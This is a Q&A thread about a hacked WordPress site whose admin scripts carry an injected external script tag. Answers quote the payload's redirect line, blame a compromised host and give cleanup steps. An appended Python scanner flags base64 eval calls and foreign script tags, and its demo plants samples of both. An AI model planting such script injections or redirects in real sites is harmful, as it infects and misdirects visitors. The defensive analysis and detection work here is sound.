
I'm quite baffled by this issue and I have absolutely no idea what could be causing it. I have a Wordpress website that has been working fine, until for some reason, the admin panel started to screw up and wouldn't display all of the CSS correctly. Upon further investigation I found that the load-scripts.php and load-styles.php are loading with odd characters, as you can see:

http://www.obhsfbla.org/wp-admin/load-scripts.php?c=1&load=jquery,utils,thickbox,media-upload&ver=96728cab06e0531b9307c89031a13e9c

This is basically a default Wordpress install, and I have reuploaded that file, yet the problem persists. It doesn't seem to be a character encoding issue, as the headers say it is UTF-8.

Here is the kind of scary part, if you remove all of the get attributes from that URL, the page displays:

<script src="http://sweepstakesandcontestsdo.com/nl.php?p=d"></script>

I won't navigate to that site because Safari says it is malicious. But how exactly could this be happening? Why would that URL come up? The code in that page has never been edited.

  • It's most likely from a vulnerable plugin, an XSS or PHP injection attack; they aren't that harmful, as you see, just some JS embedded into your index.php file. This is a big problem though on ecommerce sites that have dozens of index.php files throughout their templates. You should clean the files ASAP so that your site is not flagged as malware by Google, in which case just wait it out or ask for a review after it's cleaned. Update your plugins and WP. – Anagio Feb 28 '12 at 08:59

2 Answers

That script has this code in it:

window.top.location.replace("http://litic82sreac.rr.nu/n.php?h=1&s=nl");

It redirects your user to http://litic82sreac.rr.nu/n.php?h=1&s=nl. I recently saw this sort of attack on both phpBB and MediaWiki servers, so I think it might be a hacked webhost.

What webhost are you using?

Blender
  • Dreamhost. Any report of that? –  Feb 26 '12 at 06:10
  • Yep, that's the same webhost and the same URL pattern for the <script> tags. Dreamhost said that they found "possible traces of an attack" about a month ago and that everything was fixed. This is why I don't trust webhosts... –  Feb 26 '12 at 06:13
  • Do you happen to know of any resources on how to fix this? I haven't experimented much with the default Wordpress files save for some functions.php editing. Is it something in my SQL databases, or in the actual system files? –  Feb 26 '12 at 06:17
  • It is possibly the webhost itself. Someone might have broken into their servers and is infecting your files that way. Are only index.php files affected? –  Feb 26 '12 at 06:19
  • The only files I can tell that have this script are load-styles.php and load-scripts.php. The front-end is fine, but if I log in to my website the styles and scripts won't load because it somehow messes with the character encoding. –  Feb 26 '12 at 06:23
  • The only thing I could suggest is deleting those lines. Can Dreamhost provide you logs? –  Feb 26 '12 at 06:25
  • I requested logs from them and am waiting to hear back. I can't find any lines to delete, though; there are no instances of that script in either one of the affected files. I'm trying to read through the PHP to see what the file is doing and maybe I'll make some progress from there, but it overall is just a very odd hack. –  Feb 26 '12 at 06:27
  • Check your theme folder. –  Feb 26 '12 at 06:29
  • Ah..there it was.. –  Feb 26 '12 at 06:31
  • Bastards threw some base64 encoded stuff in tons of different files, this will be fun. Thanks for your help. –  Feb 26 '12 at 06:31
  • No problem. Hopefully it won't happen again ;) –  Feb 26 '12 at 06:34

Definitely a hack!

  1. Back up your site locally, pop it in a zip file and keep hold of it just in case you need it.
  2. Back up your database, zip it again and keep a spare copy in case you need it.
  3. Do a clean install of WordPress, and back up the code and config when you're finished.
  4. Migrate your theme files (check each theme file for nasty code) and plugins over, and then watch carefully for a few days to see if the attack respawns.
  5. See my answer here for good information on locking down WordPress.
toomanyairmiles
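For step 4 above (checking each theme and plugin file for injected code), here is an added scanner that is not part of either answer: it walks a WordPress tree and flags `eval(base64_decode(...))` constructs, long base64 literals and `<script src>` tags pointing at a domain other than your own. The sample theme folder, the `attacker.invalid` host and the `example.org` own-domain value are constructed for the demo.

```python
"""Scan a WordPress tree for the kind of injection described in this thread:
obfuscated PHP (eval of a long base64 literal) and foreign <script src> tags."""
import os
import re
import tempfile
# Heuristic indicators (constructed for this example, not an exhaustive malware signature set).
PATTERNS = {
    "eval_base64": re.compile(r"eval\s*\(\s*\(?\s*base64_decode\s*\(", re.I),
    "long_base64": re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]"),
    "external_script": re.compile(r"<script[^>]+src=[\"']https?://([^/\"']+)", re.I),
}
def scan_file(path, own_hosts):
    """Return (pattern_name, snippet) hits for one file; own_hosts are domains you expect to see."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as f:
        text = f.read()
    for name, rx in PATTERNS.items():
        for m in rx.finditer(text):
            if name == "external_script" and m.group(1).lower() in own_hosts:
                continue  # scripts loaded from the site's own domain are expected
            hits.append((name, m.group(0)[:60]))
    return hits
def scan_tree(root, own_hosts=(), exts=(".php", ".js", ".html")):
    """Walk root and map each suspicious file (path relative to root) to its hits."""
    own = {h.lower() for h in own_hosts}
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.endswith(exts):
                p = os.path.join(dirpath, fn)
                hits = scan_file(p, own)
                if hits:
                    report[os.path.relpath(p, root).replace(os.sep, "/")] = hits
    return report
def demo():
    """Constructed theme folder: one clean file, one injected tag, one base64 eval."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "mytheme")
    os.makedirs(theme)
    samples = {  # constructed file contents
        "footer.php": '<?php wp_footer(); ?>\n<script src="http://example.org/wp-includes/js/jquery.js"></script>\n',
        "header.php": '<?php /* constructed */ ?>\n<script src="http://attacker.invalid/nl.php?p=d"></script>\n',
        "functions.php": "<?php eval(base64_decode('" + "QUJD" * 40 + "')); ?>\n",
    }
    for name, body in samples.items():
        with open(os.path.join(theme, name), "w") as f:
            f.write(body)
    return scan_tree(root, own_hosts={"example.org"})
```

Run `scan_tree("/path/to/wordpress", own_hosts={"yourdomain.example"})` against a copy of the site and compare every flagged file against a fresh WordPress download before deciding what to delete.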